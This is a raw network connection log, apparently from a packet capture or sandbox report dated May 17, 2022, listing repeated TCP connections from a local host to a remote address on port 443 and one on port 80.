                                                                                                                                                                                        May 17, 2022 13:32:05.206060886 CEST50056443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.222238064 CEST50056443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.222275972 CEST44350056142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.224071980 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.224113941 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.224240065 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.224706888 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.224725008 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.272465944 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.273588896 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.275830984 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.275851965 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.306058884 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.306088924 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.306737900 CEST44350057142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.306806087 CEST44350057142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.306890011 CEST50057443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.306920052 CEST44350057142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.306935072 CEST50057443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.307111979 CEST50057443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.309942007 CEST44350057142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.310031891 CEST44350057142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.310123920 CEST50057443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.312381983 CEST50057443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.312412024 CEST44350057142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.312421083 CEST50057443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.313571930 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.313596010 CEST50057443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.313636065 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.313746929 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.314276934 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.314308882 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.360733032 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.360831976 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.399902105 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.399935007 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.404206038 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.404237032 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.455066919 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.455111027 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.455230951 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.455269098 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.455287933 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.455323935 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.455553055 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.455611944 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.455620050 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.455666065 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.468708038 CEST50058443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.468746901 CEST44350058142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.470367908 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.470431089 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.470603943 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.471322060 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.471353054 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.518656015 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.519243956 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.521970034 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.521997929 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.528079033 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.528125048 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.590275049 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.590347052 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.590368032 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.590396881 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.590409040 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.590997934 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.592760086 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.592837095 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.592912912 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.592988968 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.593008995 CEST44350059142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.593024015 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.593053102 CEST50059443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.594541073 CEST50061443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.594578028 CEST44350061142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.595791101 CEST50061443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.596904039 CEST50061443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.596927881 CEST44350061142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.649286032 CEST44350061142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.649580956 CEST50061443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.653395891 CEST50061443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.653410912 CEST44350061142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.659775019 CEST50061443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.659795046 CEST44350061142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.690548897 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.690655947 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.690722942 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.690762043 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.690778017 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.690851927 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.690864086 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.690881014 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.690916061 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.690941095 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.695208073 CEST50060443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.695234060 CEST44350060142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.696578979 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.696631908 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.696702957 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.697148085 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.697169065 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.747643948 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.747767925 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.760030031 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.760050058 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.803550005 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.803574085 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.821053982 CEST44350061142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.821105003 CEST44350061142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.821182966 CEST50061443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.821196079 CEST44350061142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.821594954 CEST50061443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.822519064 CEST50061443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.822535992 CEST44350061142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.824470997 CEST50065443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.824533939 CEST44350065142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.824731112 CEST50065443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.825171947 CEST50065443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.825203896 CEST44350065142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.873732090 CEST44350065142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.875292063 CEST50065443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.876545906 CEST50065443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.876566887 CEST44350065142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.880637884 CEST50065443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.880667925 CEST44350065142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.959963083 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.960072994 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.960087061 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.960138083 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.960215092 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.960231066 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.960280895 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.960280895 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.960608959 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.961285114 CEST50062443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.961322069 CEST44350062142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.962506056 CEST50066443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.962567091 CEST44350066142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:05.962661982 CEST50066443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.963141918 CEST50066443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:05.963170052 CEST44350066142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.014333010 CEST44350066142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.016021013 CEST50066443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.016603947 CEST50066443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.016625881 CEST44350066142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.020690918 CEST50066443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.020726919 CEST44350066142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.092328072 CEST44350065142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.092437029 CEST44350065142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.092571020 CEST50065443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.092595100 CEST44350065142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.092737913 CEST44350065142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.092822075 CEST50065443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.094276905 CEST50065443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.094299078 CEST44350065142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.103970051 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.104036093 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.104125977 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.104840040 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.104866028 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.154813051 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.157435894 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.157932043 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.157951117 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.166507959 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.166531086 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.185904026 CEST44350066142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.186013937 CEST44350066142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.186057091 CEST50066443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.186094046 CEST44350066142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.186111927 CEST50066443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.186186075 CEST44350066142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.186244965 CEST50066443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.187083960 CEST50066443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.187113047 CEST44350066142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.188287973 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.188318014 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.188839912 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.188873053 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.188879967 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.236820936 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.237359047 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.237370014 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.237376928 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.242280960 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.242294073 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.328634024 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.328751087 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.328762054 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.328798056 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.328866959 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.328881979 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.328939915 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.328950882 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.328986883 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.329004049 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.329046965 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.330956936 CEST50067443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.330984116 CEST44350067142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.333375931 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.333420992 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.333537102 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.333992004 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.334007978 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.382273912 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.382392883 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.382889986 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.382901907 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.387283087 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.387305021 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.459404945 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.459481001 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.459548950 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.459563971 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.459574938 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.459608078 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.459891081 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.459970951 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.460777044 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.460796118 CEST50068443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.460808992 CEST44350068142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.461967945 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.462003946 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.462080002 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.462496996 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.462512016 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.510915041 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.511051893 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.511607885 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.511622906 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.513299942 CEST5004280192.168.2.3180.163.251.230
                                                                                                                                                                                        May 17, 2022 13:32:06.518822908 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.518858910 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.556895971 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.556960106 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.557061911 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.557096004 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.557158947 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.557423115 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.557485104 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.557488918 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.557543039 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.558813095 CEST50069443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.558841944 CEST44350069142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.565295935 CEST50071443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.565372944 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.565516949 CEST50071443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.567761898 CEST50071443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.567819118 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.618695021 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.618936062 CEST50071443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.619241953 CEST50071443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.619251966 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.623838902 CEST50071443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.623847008 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.688189030 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.688312054 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.688385010 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.688410044 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.688431978 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.688465118 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.689409018 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.689488888 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.689502954 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.689552069 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.689553022 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.689598083 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.691335917 CEST50070443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.691358089 CEST44350070142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.693252087 CEST50072443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.693301916 CEST44350072142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.693694115 CEST50072443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.694190025 CEST50072443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.694211006 CEST44350072142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.741996050 CEST44350072142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.742057085 CEST50072443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.742521048 CEST50072443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.742532015 CEST44350072142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.746416092 CEST50072443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.746440887 CEST44350072142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.802257061 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.802333117 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.802485943 CEST50071443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.802525997 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.802602053 CEST50071443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.802651882 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.802726984 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.802815914 CEST50071443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.827224016 CEST50071443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.827277899 CEST44350071142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.830301046 CEST50073443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:32:06.830338955 CEST44350073142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:32:06.830796003 CEST50073443192.168.2.3142.250.186.46
